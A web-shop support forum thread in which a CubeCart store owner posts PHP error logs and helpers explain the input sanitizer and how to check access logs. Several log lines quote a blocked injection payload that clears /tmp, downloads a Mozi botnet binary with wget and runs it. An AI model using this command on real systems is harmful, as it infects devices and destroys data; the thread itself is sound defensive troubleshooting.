error log

[Richard1967]

Hi All

Noticed this in the error log, is it anything to be worried about?

[04-Nov-2021 00:56:32 UTC] PHP Warning:  Security Warning: Illegal array key "<?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[04-Nov-2021 01:34:54 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155

[bsmither]

Not to worry. Unless there were dozens, all in a group, close to the same time.

 

[Richard1967]

Seems to be on a daily basis since April, Novembers log

[01-Nov-2021 01:04:45 UTC] PHP Warning:  Security Warning: Illegal array key "<?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 02:16:47 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 02:25:15 UTC] PHP Warning:  Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_http://192_168_1_1:8088/Mozi_a;chmod_777_Mozi_a;/tmp/Mozi_a_jaws" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 02:25:41 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 02:36:12 UTC] PHP Warning:  Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_http://192_168_1_1:8088/Mozi_a;chmod_777_Mozi_a;/tmp/Mozi_a_jaws" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 03:27:05 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 04:11:15 UTC] PHP Warning:  Security Warning: Illegal array key "<?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 05:39:07 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 06:50:54 UTC] PHP Warning:  Security Warning: Illegal array key "style/" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 08:18:46 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 10:24:17 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 10:39:30 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 11:43:45 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 11:50:01 UTC] PHP Warning:  Security Warning: Illegal array key "style/" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 14:55:30 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 14:55:41 UTC] PHP Warning:  unlink(/home/roznzsnx/public_html/cache/4781b.sql.1f18a3fd1f4c82371a87d325449f4489.cache) [<a href='http://docs.php.net/manual/en/function.unlink.php'>function.unlink.php</a>]: No such file or directory in /home/roznzsnx/public_html/classes/cache/file.class.php on line 180
[01-Nov-2021 14:55:42 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[01-Nov-2021 15:10:21 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 19:51:25 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 19:51:26 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 19:58:24 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 21:05:38 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[01-Nov-2021 21:21:48 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 00:53:44 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 03:10:51 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[02-Nov-2021 03:36:37 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 03:42:56 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 03:52:56 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 09:36:00 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[02-Nov-2021 11:55:59 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 15:58:22 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 16:11:25 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 17:05:33 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[02-Nov-2021 19:51:11 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[02-Nov-2021 21:14:11 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 02:19:52 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 02:19:54 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 06:15:30 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 06:59:42 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[03-Nov-2021 09:45:52 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 12:57:21 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 13:28:37 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 15:24:28 UTC] PHP Warning:  Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_http://192_168_1_1:8088/Mozi_a;chmod_777_Mozi_a;/tmp/Mozi_a_jaws" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[03-Nov-2021 15:45:50 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 15:45:51 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 15:52:34 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 15:54:51 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 19:40:56 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 20:47:57 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[03-Nov-2021 21:42:45 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[04-Nov-2021 00:56:32 UTC] PHP Warning:  Security Warning: Illegal array key "&lt;?" was detected and was removed. in /home/roznzsnx/public_html/classes/sanitize.class.php on line 114
[04-Nov-2021 01:34:54 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 05:47:04 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 05:55:11 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 08:34:01 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 09:01:28 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 10:02:49 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 10:55:07 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 11:15:46 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 12:47:24 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155
[04-Nov-2021 12:47:25 UTC] PHP Warning:  Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155

Edited November 4, 2021 by Richard1967

[Richard1967]

Within cubecart system error logs there are these

• Notice Error - These are unlikely to cause operatinal problems and can be thought of as best practice recommendations. Action is not required.
• Warning Error - These are unlikely to cause operational problems now but there is a problem, one that is likely to cause bigger issues in the future. Action is recommended.
• Parse Error - These are caused by misused or missing symbols in a syntax. Action is required.
• Fatal Error - These are are classified as critical errors. Action is required.
• Exception Error - These are are classified as critical errors. Action is required.

 

[bsmither]

The above colored notices are simply an advisory of what various errors mean and how worried one should be about them.

As for the logged errors themselves, my next step would be to acquire the web server's access logs. By aligning the times (adjusting the hours for timezone differences), we can see what and where the queries are coming from.

The web server's access logs are generally enabled and are found through the management control panel (Cpanel?) for your site as provided by your hosting provider.

[Richard1967]

Hi

Had a response from the hosting site

.htaccess is generated on your account by CubeCart - I would suggest that you ask them to check what permissions should be set for the files it needs to access

[04-Nov-2021 12:47:25 UTC] PHP Warning: Invalid Security Token in /home/roznzsnx/public_html/classes/sanitize.class.php on line 155

sanitize.class.php again is a CubeCart file - you would need to find out from them what might be the likely cause.

[Tony]

So, if we narrowed down to line 114, it's this trigger_error line

Something from $data has made it upset. 

&lt; is <

        if (is_array($data)) {
            foreach ($data as $key => $value) {
                //Make sure the variable's key name is a valid one
                if (preg_match('#([^a-z0-9\-\_\:\@\|])#i', urldecode($key))) {
                    trigger_error('Security Warning: Illegal array key "'.htmlentities($key).'" was detected and was removed.', E_USER_WARNING);
                    unset($data[$key]);
                    continue;
                } else {
                    if (is_array($value)) {
                        self::_clean($data[$key]);
                    } else {
                        // If your HTML content isn't in a field with one of the following names, it's going!
                        // We shold probably standardise the field names in the future
                        if (!empty($value)) {
                            $data[$key] = self::_safety($value);
                        }
                    }
                }
            }

Edited November 6, 2021 by Tony

[bsmither]

Yes. Unfortunately, CubeCart does not give us the name of the incoming array where it found this illegal key.

As such, we can discover what might be causing this only from the $_GET array - as that array is provided by the URL's querystring, which should show in the web server's access logs.

If the illegal key is in the $_POST array (the POST payload of the incoming data), or the $_COOKIE array, we would need to rewrite a portion of CubeCart's code to log the name of the array being scanned, as well as the neutered key itself.

We can still align the access log entry by the time stamp with the error log to see where the page request is coming from.

 

[Richard1967]

1 hour ago, bsmither said:

Yes. Unfortunately, CubeCart does not give us the name of the incoming array where it found this illegal key.

As such, we can discover what might be causing this only from the $_GET array - as that array is provided by the URL's querystring, which should show in the web server's access logs.

If the illegal key is in the $_POST array (the POST payload of the incoming data), or the $_COOKIE array, we would need to rewrite a portion of CubeCart's code to log the name of the array being scanned, as well as the neutered key itself.

We can still align the access log entry by the time stamp with the error log to see where the page request is coming from.

 

I don't know how to access the log entry unfortunately 

[bsmither]

We would like to know if your site is hosted with anyone. If so, they have probably provided you with a means to manage the site's settings via a "control panel". (Some names of popular control panels are: Cpanel and Plesk.)

Within the control panel, there would be a section of tools and features that deal with 'Metrics". Within that section would be a tool to download "Raw Access". (The file will likely be compressed: zip, tar, etc.)

Once uncompressed on your local computer, the listing will have what we need to scan for.

 

Edited November 6, 2021 by bsmither

[Richard1967]

ok Yes Raw access in Cpanel

I downloaded it but it seemed to be unreadable, GZ file

Would you like me to copy & paste it in here?

[bsmither]

It is compressed.

Undoubtedly, you have a utility on your computer to decompress various types of compressed files.

If, for some reason, you don't have such a utility, feel free to attach it to a PM addressed directly to me.

 

[Richard1967]

It downloaded as the file attached

receka.co.uk-Nov-2021.gz

[bsmither]

Does your site respond to any other domain name? Almost all "Illegal array key" entries are at a time not found in the access log for "receka.co.uk".

Otherwise, everything else is just the result of non-personal, happens to everyone, probing for specific vulnerabilities that exist across a very wide range of internet-connected hardware and applications (nothing specific to CubeCart).

 

[Richard1967]

No just receka

I have 3 cubecart sites & they all have the same error logs.

[05-Nov-2021 20:35:02 Europe/London] PHP Warning:  No callback method defined. in /home/ctncrtns/public_html/classes/cubecart.class.php on line 311
[05-Nov-2021 21:01:20 Europe/London] PHP Warning:  Invalid Security Token in /home/ctncrtns/public_html/classes/sanitize.class.php on line 155
[05-Nov-2021 23:02:23 Europe/London] PHP Warning:  Security Warning: Illegal array key "<?" was detected and was removed. in /home/ctncrtns/public_html/classes/sanitize.class.php on line 114

[bsmither]

Three sites? How are they kept separate?

 

[Richard1967]

5 minutes ago, bsmither said:

Three sites? How are they kept separate?

 

Ive asked the question with the hosting site.

[Richard1967]

A standard WHM hosting environment